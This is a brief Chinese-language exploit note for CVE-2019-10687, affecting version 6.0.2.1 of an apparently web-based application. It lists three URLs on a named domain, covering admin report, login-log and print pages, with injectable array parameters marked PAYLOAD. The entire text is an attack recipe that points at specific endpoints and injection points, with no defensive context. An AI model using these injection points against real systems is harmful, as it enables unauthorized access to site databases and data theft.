涉及到的版本号:6.0.2.1

CVE-2019-10687

Exp:

https://hedysx.com/admin/index.php?module=report&page=report_entry&entry_id%5B0%5D=325PAYLOAD&filter%5Bt%5D=1&ajax=1


https:// hedysx.com /admin/index.php?module=log&page=login_log&action=detail&id=PAYLOAD

  
https://hedysx.com/index.php?View=print&id%5B%5D=PAYLOAD